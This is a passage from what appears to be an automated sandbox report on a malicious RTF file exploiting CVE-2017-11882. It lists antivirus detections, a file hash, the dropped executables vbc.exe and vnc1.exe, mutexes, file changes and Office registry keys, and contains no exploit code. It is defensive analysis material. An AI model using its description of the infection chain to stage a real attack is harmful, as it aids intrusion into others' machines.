636. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbb\\xd3\\x8f\\xd9\\xd2\\xba\\xd9%x\\x7f\\xd1\\xef\\x08vu\\xec\\xed\\xe3\\x04\\xd0d\\xe1\\xf2\\x8c\\xd2\\xbf\\\\x8c\\xe9y\\xe8gi\\x07\\xca\\xb3\\xc0l|\\xa6\\xb9\\xf8\\x0c\\xd1\\xe0\\xc9>\\xb5\\x88\\x9di\\xbc\\xf4\\xb8\\xd2g-w\\xd8<rk5*\\x8dn\\xc5\\xda\\x1a\\x16\\x12\\x95\\xbd\\xfbuo\\x0f\\x84xaa\\xe8\\x98\\xa81o>y\\xb8\\x13\t\\x1e\\xcb-g\\xefh\\xd3/y1\\xff\\xdb\\xc3@\\xc8\\x02u\\xf8q\\x1c\\x9a\\x1ev w\\x13\\xc5\\xa6\\x9d\\xa4\\xae\\x11\\xf49\\x91\\x1ae\\x97,7:\\x90\\xae\\xc4\\xe5\\xfd\\x90\\xe4l\\xc9\\x9blv\\xafm\\xa1\\xd4\\xa3m\\xe1\\xdf\\xdb?\\x035^w\\xb8\\x0b\\x04t7\\xb1\\x81\\x19\\xfc\\x03\\x00\\x85\\xcci\\x01s\\x12\\xb5\\xf3\\x9c\\x13y&\\xf91\\xc7\\xeb\\xca\\xa0p\\xde\\x9aa\\xe6\\xdb\\x03b\\xdf\\x9f|\\x98f=\\xee\\xb5nd\\x7f\\x9d4s\\xe2\\x97\\x19.n\\x830\\xa7\\xd9\\xa1\\x9b\\xbc\\xa9\\x0e\\xe2\\xa2\\x8as\\xf4_u\\xe2l\\x98&\\xe2\\x9e\\x13\\xa0\\xdek\t\\xdah\\xc4o\\x9arv"
637.  
638.  
639.  
640.  
641. "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
642. "Details":
643.  
644. "created_process": "\"C:\\Users\\Public\\vbc.exe\" "
645.  
646.  
647.  
648.  
649. "Description": "Creates a hidden or system file",
650. "Details":
651.  
652. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$n0Eo2U.doc"
653.  
654.  
655. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
656.  
657.  
658.  
659.  
660. "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
661. "Details":
662.  
663. "MicroWorld-eScan": "Exploit.RTF-ObfsObjDat.Gen"
664.  
665.  
666. "FireEye": "Exploit.RTF-ObfsObjDat.Gen"
667.  
668.  
669. "McAfee": "Exploit-CVE2017-11882.by"
670.  
671.  
672. "Arcabit": "Exploit.RTF-ObfsObjDat.Gen"
673.  
674.  
675. "Symantec": "Exp.CVE-2017-11882!g3"
676.  
677.  
678. "Avast": "RTF:CVE-2017-11882-A Expl"
679.  
680.  
681. "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
682.  
683.  
684. "BitDefender": "Exploit.RTF-ObfsObjDat.Gen"
685.  
686.  
687. "Ad-Aware": "Exploit.RTF-ObfsObjDat.Gen"
688.  
689.  
690. "Sophos": "Troj/RtfExp-EQ"
691.  
692.  
693. "McAfee-GW-Edition": "Exploit-CVE2017-11882.by"
694.  
695.  
696. "Emsisoft": "Exploit.RTF-ObfsObjDat.Gen (B)"
697.  
698.  
699. "Cyren": "CVE-2017-11882.C.gen!Camelot"
700.  
701.  
702. "MAX": "malware (ai score=88)"
703.  
704.  
705. "Antiy-AVL": "TrojanExploit/RTF.CVE-2017-11882"
706.  
707.  
708. "Microsoft": "Exploit:O97M/CVE-2017-11882.K"
709.  
710.  
711. "ZoneAlarm": "HEUR:Exploit.MSOffice.Generic"
712.  
713.  
714. "GData": "Exploit.RTF-ObfsObjDat.Gen"
715.  
716.  
717. "AhnLab-V3": "OLE/Cve-2017-11882.Gen"
718.  
719.  
720. "ALYac": "Exploit.RTF-ObfsObjDat.Gen"
721.  
722.  
723. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
724.  
725.  
726. "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.E"
727.  
728.  
729. "Ikarus": "Exploit.CVE-2017-11882"
730.  
731.  
732. "AVG": "RTF:CVE-2017-11882-A Expl"
733.  
734.  
735.  
736.  
737. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
738. "Details":
739.  
740. "target": "clamav:Rtf.Dropper.Agent-7156378-0, sha256:790666229814b82c78583a5adda3ef277a3f9eec30d90b2a78b56e269f89b0a9, type:Rich Text Format data, version 1, unknown character set"
741.  
742.  
743. "dropped": "clamav:Rtf.Dropper.Agent-7156378-0, sha256:790666229814b82c78583a5adda3ef277a3f9eec30d90b2a78b56e269f89b0a9 , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\awn0Eo2U.doc, type:Rich Text Format data, version 1, unknown character set"
744.  
745.  
746.  
747.  
748. "Description": "Drops a binary and executes it",
749. "Details":
750.  
751. "binary": "C:\\Users\\Public\\vbc.exe"
752.  
753.  
754.  
755.  
756. "Description": "Created network traffic indicative of malicious activity",
757. "Details":
758.  
759. "signature": "ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile"
760.  
761.  
762.  
763.  
764.  
765. * Started Service:
766. "osppsvc"
767.  
768.  
769. * Mutexes:
770. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
771. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
772. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
773. "CicLoadWinStaWinSta0",
774. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
775. "Global\\552FFA80-3393-423d-8671-7BA046BB5906",
776. "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
777. "Global\\ADAP_WMI_ENTRY",
778. "Global\\RefreshRA_Mutex",
779. "Global\\RefreshRA_Mutex_Lib",
780. "Global\\RefreshRA_Mutex_Flag"
781.  
782.  
783. * Modified Files:
784. "C:\\Users\\user\\AppData\\Local\\Temp\\awn0Eo2U.doc",
785. "C:\\Users\\user\\AppData\\Local\\Temp\\~$n0Eo2U.doc",
786. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF72247552-6467-4E05-BFA4-8529ADF71DBF.tmp",
787. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
788. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
789. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
790. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
791. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8A3D.tmp",
792. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8A3E.tmp",
793. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRSB83840AA-137C-432B-9DD4-0A4156485FDE.tmp",
794. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of awn0Eo2U.asd",
795. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
796. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
797. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF46871C9E271D3114.TMP",
798. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB21A.tmp",
799. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB26A.tmp",
800. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB269.tmp",
801. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB27C.tmp",
802. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB3A7.tmp",
803. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB3A8.tmp",
804. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB27B.tmp",
805. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB3B9.tmp",
806. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB28D.tmp",
807. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB437.tmp",
808. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB457.tmp",
809. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB458.tmp",
810. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5A2.tmp",
811. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5B3.tmp",
812. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5C3.tmp",
813. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5F3.tmp",
814. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB613.tmp",
815. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB624.tmp",
816. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB636.tmp",
817. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB635.tmp",
818. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB468.tmp",
819. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB711.tmp",
820. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB760.tmp",
821. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB85B.tmp",
822. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB8F9.tmp",
823. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB919.tmp",
824. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB92B.tmp",
825. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB92A.tmp",
826. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBAB3.tmp",
827. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB94B.tmp",
828. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBC8A.tmp",
829. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBC89.tmp",
830. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD",
831. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD",
832. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBD18.tmp",
833. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBD76.tmp",
834. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\vnc1.exe",
835. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
836.  
837.  
838. * Deleted Files:
839. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8A3D.tmp",
840. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8A3E.tmp",
841. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
842. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
843. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of awn0Eo2U.asd",
844. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
845. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
846.  
847.  
848. * Modified Registry Keys:
849. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\yn",
850. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
851. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
852. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
853. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
854. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
855. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
856. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
857. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
858. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1660403",
859. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1660403\\1660403",
860. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
861. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
862. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
863. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
864. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
865. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
866. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
868. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
869. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
870. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
871. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
872. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
873. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
874. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
875. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
876. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
877. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
878. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
880. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
881. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
882. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
883. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
884. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
885. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
886. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
887. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
888. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
889. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
890. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
891. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
892. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
895. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
897. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
899. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
900. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
901. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
902. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
903. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
904. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
905. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
906. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
907. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
908. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
909. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
910. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
911. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
912. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
913. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
914. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
915. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
916. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
917. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
918. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
919. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
920. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
921. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
922. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
923. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
924. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
925. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
926. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
927. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
928. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
929. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
930. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
931. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
932. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
933. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
934. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
935. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
936. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
937. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
938. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
939. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
940. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
941. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
942. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
943. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
944. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
945. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
946. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
947. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
948. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
949. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
950. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
951. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
952. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
953. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
